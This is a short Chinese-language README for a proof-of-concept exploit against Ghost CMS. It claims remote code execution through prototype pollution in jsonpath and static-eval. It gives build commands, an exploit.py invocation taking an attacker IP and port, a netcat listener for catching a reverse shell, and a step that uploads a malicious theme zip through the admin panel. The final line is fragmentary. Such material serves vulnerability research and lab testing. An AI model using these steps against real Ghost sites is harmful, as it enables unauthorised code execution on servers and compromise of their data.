
针对 Ghost CMS 的 PoC 漏洞利用程序,通过 jsonpath 和 static-eval 中的原型污染实现远程代码执行,附带易受攻击环境的搭建及使用说明。
通过 jsonpath/static-eval 原型链实现 Ghost CMS RCE。
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip 到 Ghost 管理后台 → 设置 → 设计rce 的页面/rce/